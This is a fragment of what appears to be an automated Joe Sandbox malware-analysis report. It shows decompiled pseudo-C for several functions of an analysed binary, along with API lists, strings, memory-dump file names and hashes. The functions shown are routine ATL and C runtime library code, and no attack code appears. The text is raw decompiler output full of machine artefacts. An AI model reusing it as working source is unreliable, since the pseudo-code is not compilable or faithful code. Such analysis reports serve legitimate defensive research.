                      Function 0094B1C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E0094B1C0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v12;
				char _v24;
				intOrPtr _v32;
				char _v40;
				signed int _v48;
				signed int _v53;
				struct HINSTANCE__* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				void _v80;
				void* _t62;
				intOrPtr _t68;
				void* _t70;
				void* _t82;
				void* _t87;
				struct HINSTANCE__* _t89;
				_Unknown_base(*)()* _t91;
				intOrPtr _t118;
				void* _t135;
				void* _t136;
				void* _t137;

				_t131 = __esi;
				memset( &_v80, 0xcccccccc, 0x13 << 2);
				_t137 = _t136 + 0xc;
				E00942ED0( &_v12);
				E0094E6E0( &_v24);
				_t62 = E0094E760( &_v24);
				_v32 = E0094A1D0(__ebx, _a4, _a8, L00942F40( &_v12), _t62);
				if(_v32 < 0) {
					L10:
					_t118 = _v32;
					_v72 = _t118;
					E00946450( &_v24, __eflags);
					E009430B0( &_v12, _t131);
					_t68 = _v72;
					L11:
					_push(_t118);
					E009D14C0(_t135, 0x94b364);
					_t70 = _t68;
					return E009D1520(_t70, _t135 - _t137 + 0x4c);
				}
				_v76 = E0094E710( &_v24);
				_t131 = _t137;
				_v32 = E009D1520( *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0x1c))))(_v76,  &_v40), _t137 - _t137);
				if(_v32 < 0) {
					goto L10;
				}
				_v48 = 0;
				_v53 = 0;
				_v32 = E0094A1A0( &_v53);
				_t143 = _v32;
				if(_v32 >= 0) {
					__eflags = (_v53 & 0x000000ff) - 1;
					if((_v53 & 0x000000ff) == 1) {
						_t89 = GetModuleHandleW(L"OLEAUT32.DLL");
						__eflags = _t137 - _t137;
						_v64 = E009D1520(_t89, _t137 - _t137);
						__eflags = _v64;
						if(_v64 != 0) {
							_t91 = GetProcAddress(_v64, "UnRegisterTypeLibForUser");
							__eflags = _t137 - _t137;
							_v48 = E009D1520(_t91, _t137 - _t137);
						}
					}
					__eflags = _v48;
					if(_v48 == 0) {
						_v48 = __imp__#186;
					}
					_t82 = _v48(_v40,  *(_v40 + 0x18) & 0x0000ffff,  *(_v40 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_v40 + 0x10)),  *((intOrPtr*)(_v40 + 0x14)));
					__eflags = _t137 - _t137;
					_v32 = E009D1520(_t82, _t137 - _t137);
					_v80 = E0094E710( &_v24);
					_t131 = _t137;
					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_v80 + 0x30))))(_v80, _v40);
					__eflags = _t137 - _t137;
					E009D1520(_t87, __eflags);
					goto L10;
				}
				_t118 = _v32;
				_v68 = _t118;
				E00946450( &_v24, _t143);
				E009430B0( &_v12, _t131);
				_t68 = _v68;
				goto L11;
			}

























                      0x0094b1c0
                      0x0094b1d5
                      0x0094b1d5
                      0x0094b1da
                      0x0094b1e2
                      0x0094b1ea
                      0x0094b206
                      0x0094b20d
                      0x0094b328
                      0x0094b328
                      0x0094b32b
                      0x0094b331
                      0x0094b339
                      0x0094b33e
                      0x0094b341
                      0x0094b341
                      0x0094b34b
                      0x0094b350
                      0x0094b361
                      0x0094b361
                      0x0094b21b
                      0x0094b21e
                      0x0094b239
                      0x0094b240
                      0x00000000
                      0x00000000
                      0x0094b246
                      0x0094b24d
                      0x0094b25a
                      0x0094b25d
                      0x0094b261
                      0x0094b285
                      0x0094b288
                      0x0094b291
                      0x0094b297
                      0x0094b29e
                      0x0094b2a1
                      0x0094b2a5
                      0x0094b2b2
                      0x0094b2b8
                      0x0094b2bf
                      0x0094b2bf
                      0x0094b2a5
                      0x0094b2c2
                      0x0094b2c6
                      0x0094b2ce
                      0x0094b2ce
                      0x0094b2f5
                      0x0094b2f8
                      0x0094b2ff
                      0x0094b30a
                      0x0094b30d
                      0x0094b31f
                      0x0094b321
                      0x0094b323
                      0x00000000
                      0x0094b323
                      0x0094b263
                      0x0094b266
                      0x0094b26c
                      0x0094b274
                      0x0094b279
                      0x00000000

                      APIs
                      • ~Module.VCCORLIBD ref: 0094B26C
                        • Part of subcall function 009430B0: SysFreeString.OLEAUT32 ref: 009430C7
                      • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,00000000), ref: 0094B291
                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 0094B2B2
                      • ~Module.VCCORLIBD ref: 0094B331
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094B34B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module$AddressCheckFreeHandleProcStackStringVars@8
                      • String ID: OLEAUT32.DLL$UnRegisterTypeLibForUser
                      • API String ID: 1449819490-2196524522
                      • Opcode ID: 58f2e83c20dc05ab426362073b409c8a59f6ba2627e28ce6e0be2b844bc6373c
                      • Instruction ID: e79604fab72a24265ca2eae20f44feb24ce176a8e81587cda5cca382057bc143
                      • Opcode Fuzzy Hash: 58f2e83c20dc05ab426362073b409c8a59f6ba2627e28ce6e0be2b844bc6373c
                      • Instruction Fuzzy Hash: 62512676D001189FCB18EFA9D891FEEB7B5AF88300F108159E416B7291DB34AE45CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094BF90 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 113COMMON
                      Download Yara Rule
                      C-Code - Quality: 58%
                      			E0094BF90(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v20;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _t50;
				void* _t52;
				long _t54;
				intOrPtr _t56;
				void* _t66;
				intOrPtr* _t84;
				void* _t90;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;

				_t84 = __edx;
				_t90 =  &_v52;
				memset(_t90, 0xcccccccc, 0xc << 2);
				_t96 = _t95 + 0xc;
				_t91 = _t90 + 0xc;
				if(_a4 != 0) {
					_v8 = 0;
					E00951D00(__ebx,  &_v20, _t91, __esi, _a4 + 4, 0);
					__eflags = E00951D90( &_v20, __esi);
					if(__eflags >= 0) {
						_t84 =  *((intOrPtr*)(_a4 + 0x1c));
						_v28 = _t84;
						__eflags = _v28;
						if(_v28 == 0) {
							L16:
							_v52 = _v8;
							E00951D60( &_v20);
							_t50 = _v52;
							L17:
							_push(_t84);
							E009D14C0(_t94, 0x94c0f0);
							_t52 = _t50;
							return E009D1520(_t52, _t94 - _t96 + 0x30);
						}
						_t54 = GetCurrentThreadId();
						__eflags = _t96 - _t96;
						_v32 = E009D1520(_t54, _t96 - _t96);
						_v36 = 0;
						while(1) {
							__eflags = _v28;
							if(_v28 == 0) {
								goto L16;
							}
							_t56 = _v28;
							__eflags =  *((intOrPtr*)(_t56 + 4)) - _v32;
							if( *((intOrPtr*)(_t56 + 4)) != _v32) {
								_v36 = _v28;
								_t84 = _v28;
								_v28 =  *((intOrPtr*)(_t84 + 8));
								continue;
							}
							__eflags = _v36;
							if(_v36 != 0) {
								 *((intOrPtr*)(_v36 + 8)) =  *((intOrPtr*)(_v28 + 8));
							} else {
								 *((intOrPtr*)(_a4 + 0x1c)) =  *((intOrPtr*)(_v28 + 8));
							}
							_t84 = _v28;
							_v8 =  *_t84;
							goto L16;
						}
						goto L16;
					}
					_push("ERROR : Unable to lock critical section in AtlWinModuleExtractCreateWndData\n");
					_push(0);
					_push(E0094F1E0(0xb33748));
					_push(E009423B0( &_v44, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20af));
					E009423E0(__ebx, _t91, __esi, __eflags);
					_t96 = _t96 + 0x10;
					__eflags = 0;
					if(0 == 0) {
						_t66 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20b0, 0, "%ls", 0x9f40dc);
						_t96 = _t96 + 0x18;
						__eflags = _t66 - 1;
						if(_t66 == 1) {
							asm("int3");
						}
					}
					_v48 = _v8;
					E00951D60( &_v20);
					_t50 = _v48;
					goto L17;
				}
				_t50 = 0;
				goto L17;
			}






















                      0x0094bf90
                      0x0094bf98
                      0x0094bfa5
                      0x0094bfa5
                      0x0094bfa5
                      0x0094bfab
                      0x0094bfb4
                      0x0094bfc7
                      0x0094bfd4
                      0x0094bfd6
                      0x0094c048
                      0x0094c04b
                      0x0094c04e
                      0x0094c052
                      0x0094c0b9
                      0x0094c0bc
                      0x0094c0c2
                      0x0094c0c7
                      0x0094c0ca
                      0x0094c0ca
                      0x0094c0d4
                      0x0094c0d9
                      0x0094c0ea
                      0x0094c0ea
                      0x0094c056
                      0x0094c05c
                      0x0094c063
                      0x0094c066
                      0x0094c06d
                      0x0094c06d
                      0x0094c071
                      0x00000000
                      0x00000000
                      0x0094c073
                      0x0094c079
                      0x0094c07c
                      0x0094c0ab
                      0x0094c0ae
                      0x0094c0b4
                      0x00000000
                      0x0094c0b4
                      0x0094c07e
                      0x0094c082
                      0x0094c09b
                      0x0094c084
                      0x0094c08d
                      0x0094c08d
                      0x0094c09e
                      0x0094c0a3
                      0x00000000
                      0x0094c0a3
                      0x00000000
                      0x0094c06d
                      0x0094bfd8
                      0x0094bfdd
                      0x0094bfe9
                      0x0094bffc
                      0x0094bffd
                      0x0094c002
                      0x0094c005
                      0x0094c007
                      0x0094c021
                      0x0094c026
                      0x0094c029
                      0x0094c02c
                      0x0094c02e
                      0x0094c02e
                      0x0094c02c
                      0x0094c032
                      0x0094c038
                      0x0094c03d
                      0x00000000
                      0x0094c03d
                      0x0094bfad
                      0x00000000

                      APIs
                      Strings
                      • %ls, xrefs: 0094C00E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094BFEF
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C01A
                      • ERROR : Unable to lock critical section in AtlWinModuleExtractCreateWndData, xrefs: 0094BFD8
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlWinModuleExtractCreateWndData
                      • API String ID: 1089072215-1366296842
                      • Opcode ID: 2517af37d0aeeae0ed7908f883aad4f6c186eaec37e09c1907e1fff0c09b5777
                      • Instruction ID: c79abd3493c4e222cf55676ccfb76bed8cdec50581a81cc9c5e054c3ff4d3bda
                      • Opcode Fuzzy Hash: 2517af37d0aeeae0ed7908f883aad4f6c186eaec37e09c1907e1fff0c09b5777
                      • Instruction Fuzzy Hash: 8B417CB5E00209EFDF54DF94D892FBEB7B4BB88304F10851AE90567382E774A984CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009483D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 112COMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E009483D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v24;
				char _v44;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				intOrPtr _t60;
				void* _t62;
				void* _t64;
				intOrPtr _t68;
				intOrPtr _t78;
				intOrPtr _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __esi;
				_t74 = __ebx;
				_push(__ecx);
				_t101 =  &_v92;
				memset(_t101, 0xcccccccc, 0x16 << 2);
				_t106 = _t105 + 0xc;
				_t102 = _t101 + 0x16;
				_pop(_t78);
				_v8 = _t78;
				E009441C0( &_v24, 0);
				E0094E200( &_v44);
				_v56 = 0;
				_t97 = _a8;
				_v64 = E00948100(__ebx, _v8, _t97, _t101 + 0x16, __esi, _a12, _t97,  &_v44,  &_v56);
				_t110 = _v64;
				if(_v64 >= 0) {
					_t97 = _a4;
					E009442A0( &_v24, _t97);
					_v68 = 2;
					__eflags = _a4;
					if(_a4 != 0) {
						__eflags = _v56;
						if(__eflags == 0) {
							_v88 = _v44;
						} else {
							_v88 = _v56;
						}
						_t97 = _v88;
						_v68 = E00944A80(_t74,  &_v24, _t102, _t103, __eflags, _t97);
					}
					__eflags = _v68;
					if(__eflags != 0) {
						__eflags = _v68 - 2;
						if(__eflags != 0) {
							__eflags = _v68 - 3;
							if(__eflags != 0) {
								__eflags = _v56;
								if(__eflags == 0) {
									_v92 = _v44;
								} else {
									_v92 = _v56;
								}
								_t97 = _v92;
								_t64 = E0094F1F0(0xb337ac);
								E009423E0(_t74, _t102, _t103, __eflags, E009423B0( &_v80, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x1ad), _t64, 0, "Failed to delete key %Ts or one of its subkeys\n", _t97);
								_t68 = E00942E00( &_v80, __eflags, _v68);
								_t106 = _t106 + 0x18;
								_v64 = _t68;
							}
						}
					}
					E00944260( &_v24);
					_v84 = _v64;
					L00951F30( &_v44, __eflags);
					E00944220( &_v24, __eflags);
					_t60 = _v84;
				} else {
					_v72 = _v64;
					L00951F30( &_v44, _t110);
					E00944220( &_v24, _t110);
					_t60 = _v72;
				}
				_push(_t97);
				E009D14C0(_t104, 0x948528);
				_t62 = _t60;
				return E009D1520(_t62, _t104 - _t106 + 0x58);
			}
























                      0x009483d0
                      0x009483d0
                      0x009483d7
                      0x009483d8
                      0x009483e5
                      0x009483e5
                      0x009483e5
                      0x009483e7
                      0x009483e8
                      0x009483f0
                      0x009483f8
                      0x009483fd
                      0x0094840c
                      0x0094841c
                      0x0094841f
                      0x00948423
                      0x00948443
                      0x0094844a
                      0x0094844f
                      0x00948456
                      0x0094845a
                      0x0094845c
                      0x00948460
                      0x0094846d
                      0x00948462
                      0x00948465
                      0x00948465
                      0x00948470
                      0x0094847c
                      0x0094847c
                      0x0094847f
                      0x00948483
                      0x00948485
                      0x00948489
                      0x0094848b
                      0x0094848f
                      0x00948491
                      0x00948495
                      0x009484a2
                      0x00948497
                      0x0094849a
                      0x0094849a
                      0x009484a5
                      0x009484b5
                      0x009484ce
                      0x009484da
                      0x009484df
                      0x009484e2
                      0x009484e2
                      0x0094848f
                      0x00948489
                      0x009484e8
                      0x009484f0
                      0x009484f6
                      0x009484fe
                      0x00948503
                      0x00948425
                      0x00948428
                      0x0094842e
                      0x00948436
                      0x0094843b
                      0x0094843b
                      0x00948506
                      0x00948510
                      0x00948515
                      0x00948525

                      APIs
                      • std::exception::exception.LIBCMTD ref: 009483F8
                        • Part of subcall function 00948100: @_RTC_CheckStackVars@8.LIBCMTD ref: 009482EA
                      • ~Module.VCCORLIBD ref: 00948436
                      • _Smanip.LIBCPMTD ref: 009484C8
                      • ~Module.VCCORLIBD ref: 009484FE
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00948510
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 009484C0
                      • Failed to delete key %Ts or one of its subkeys, xrefs: 009484A9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckModuleStackVars@8$Smanipstd::exception::exception
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$Failed to delete key %Ts or one of its subkeys
                      • API String ID: 2246551222-193758817
                      • Opcode ID: d9dfefe1d1c3d4062203a2b2459f1a7f25d0b24a6a3afb81c4eb4bba5cad765a
                      • Instruction ID: 1299643fe5adac914d2a58726a55aa31aa478e7382d33dc91d624a8ae0b630d5
                      • Opcode Fuzzy Hash: d9dfefe1d1c3d4062203a2b2459f1a7f25d0b24a6a3afb81c4eb4bba5cad765a
                      • Instruction Fuzzy Hash: 9B410A71D01109EBCB18EFD4E995FEEB7B9AF88304F10412AF5026B291DB706E49CB61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009ACA20 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 96memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E009ACA20(void* __ecx, void* _a4, signed int _a8) {
				long _v8;
				long _v12;
				signed int _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _t27;
				intOrPtr _t33;
				signed char _t36;
				void* _t44;
				void* _t45;
				void* _t50;
				void* _t53;

				_t45 = __ecx;
				if(_a4 == 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_v12 = _v8;
				_t57 = _v12;
				if(_v12 == 0) {
					_t44 = L00994930(_t57, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\expand.cpp", 0x3e, 0, L"%ls", L"block != nullptr");
					_t53 = _t53 + 0x18;
					if(_t44 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					__eflags = _a8 - 0xffffffe0;
					if(_a8 <= 0xffffffe0) {
						_t27 =  *0xb31510; // 0xe60000
						_v28 = HeapSize(_t27, 0, _a4);
						__eflags = _a8;
						if(_a8 != 0) {
							_v16 = _a8;
						} else {
							_v16 = 1;
						}
						_v24 = _v16;
						_t47 = _a4;
						_t50 =  *0xb31510; // 0xe60000
						_v20 = HeapReAlloc(_t50, 0x10, _a4, _v24);
						__eflags = _v20;
						if(_v20 == 0) {
							__eflags = _v24 - _v28;
							if(_v24 > _v28) {
								L18:
								_t33 = E00992E90(_t47, GetLastError());
								 *((intOrPtr*)(L00992F70(_t47))) = _t33;
								__eflags = 0;
								return 0;
							}
							_t47 = _v28;
							_t36 = E009AC9A0(_v28);
							_t53 = _t53 + 4;
							__eflags = _t36 & 0x000000ff;
							if((_t36 & 0x000000ff) != 0) {
								goto L18;
							}
							return _a4;
						} else {
							return _v20;
						}
					}
					 *((intOrPtr*)(L00992F70(_t45))) = 0xc;
					return 0;
				} else {
					 *((intOrPtr*)(L00992F70(_t45))) = 0x16;
					E00992900(L"block != nullptr", L"_expand_base", L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\expand.cpp", 0x3e, 0);
					return 0;
				}
			}
















                      0x009aca20
                      0x009aca2d
                      0x009aca38
                      0x009aca2f
                      0x009aca2f
                      0x009aca2f
                      0x009aca42
                      0x009aca45
                      0x009aca49
                      0x009aca60
                      0x009aca65
                      0x009aca6b
                      0x009aca6d
                      0x009aca6d
                      0x009aca6b
                      0x009aca72
                      0x009acaa1
                      0x009acaa5
                      0x009acabf
                      0x009acacb
                      0x009acace
                      0x009acad2
                      0x009acae0
                      0x009acad4
                      0x009acad4
                      0x009acad4
                      0x009acae6
                      0x009acaed
                      0x009acaf3
                      0x009acb00
                      0x009acb03
                      0x009acb07
                      0x009acb11
                      0x009acb14
                      0x009acb2e
                      0x009acb35
                      0x009acb44
                      0x009acb46
                      0x00000000
                      0x009acb46
                      0x009acb16
                      0x009acb1a
                      0x009acb1f
                      0x009acb25
                      0x009acb27
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009acb09
                      0x00000000
                      0x009acb09
                      0x009acb07
                      0x009acaac
                      0x00000000
                      0x009aca74
                      0x009aca79
                      0x009aca92
                      0x00000000
                      0x009aca9a

                      APIs
                      • HeapSize.KERNEL32(00E60000,00000000,00000000), ref: 009ACAC5
                      • HeapReAlloc.KERNEL32(00E60000,00000010,00000000,?), ref: 009ACAFA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Heap$AllocSize
                      • String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
                      • API String ID: 3906553864-3244948836
                      • Opcode ID: 0440308b9a954364113bb38e1d2aca30a94485ae40f9025c040543848438277a
                      • Instruction ID: 26dfc8f95bdfac700507ab3ee13cc058f74945492a6aa5eade2d7d2805b20d3f
                      • Opcode Fuzzy Hash: 0440308b9a954364113bb38e1d2aca30a94485ae40f9025c040543848438277a
                      • Instruction Fuzzy Hash: 2831A0B0D4420CFBDB10EFA9D846BAE77B8AB85304F108855F415AF281D7B59E80CBE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00952030 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92COMMON
                      Download Yara Rule
                      C-Code - Quality: 57%
                      			E00952030(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v24;
				void* _t33;
				intOrPtr _t37;
				void* _t40;
				void* _t41;
				void* _t46;
				void* _t64;
				void* _t68;
				void* _t69;

				_t64 = __edi;
				_t47 = __ebx;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = E00943B30(__ebx, 0xb33710, __eflags);
				_t72 = _v8;
				if(_v8 == 0) {
					_t46 = L00994930(_t72, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf2f, 0, L"%ls", L"pThis != 0");
					_t69 = _t69 + 0x18;
					if(_t46 == 1) {
						asm("int3");
					}
				}
				if(_v8 != 0) {
					 *((intOrPtr*)(_v8 + 4)) = _a4;
					_t66 = _t69;
					_t33 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))();
					__eflags = _t69 - _t69;
					E0094C490(_v8 + 8, __eflags, E009D1520(_t33, __eflags), _v8);
					_v12 = E0094C4D0(_v8 + 8, __eflags);
					_t37 = E0094C3E0(_t69, _a4, 4, _v12);
					_t69 = _t69 + 0xc;
					_v16 = _t37;
					__eflags = _v16 - E00952030;
					if(__eflags != 0) {
						_push("Subclassing through a hook discarded.\n");
						_push(0);
						_push(E0094F1E0(0xb33748));
						_push(E009423B0( &_v24, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf3e));
						E009423E0(_t47, _t64, _t66, __eflags);
						_t69 = _t69 + 0x10;
					}
					_t40 = _v12(_a4, _a8, _a12, _a16);
					__eflags = _t69 - _t69;
					_t41 = E009D1520(_t40, __eflags);
				} else {
					_t41 = 0;
				}
				return E009D1520(_t41, _t68 - _t69 + 0x14);
			}
















                      0x00952030
                      0x00952030
                      0x0095203c
                      0x0095203f
                      0x00952042
                      0x00952045
                      0x00952048
                      0x00952055
                      0x00952058
                      0x0095205c
                      0x00952076
                      0x0095207b
                      0x00952081
                      0x00952083
                      0x00952083
                      0x00952081
                      0x00952088
                      0x00952097
                      0x009520a3
                      0x009520ab
                      0x009520ad
                      0x009520bb
                      0x009520cb
                      0x009520d8
                      0x009520dd
                      0x009520e0
                      0x009520e3
                      0x009520ea
                      0x009520ec
                      0x009520f1
                      0x009520fd
                      0x00952110
                      0x00952111
                      0x00952116
                      0x00952116
                      0x0095212b
                      0x0095212e
                      0x00952130
                      0x0095208a
                      0x0095208a
                      0x0095208a
                      0x00952143

                      APIs
                      • ___InlineInterlockedCompareExchangePointer.VCCORLIBD ref: 009520D8
                      • _Smanip.LIBCPMTD ref: 0095210B
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00952103
                      • pThis != 0, xrefs: 0095205E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 0095206F
                      • %ls, xrefs: 00952063
                      • Subclassing through a hook discarded., xrefs: 009520EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CompareExchangeInlineInterlockedPointerSmanip
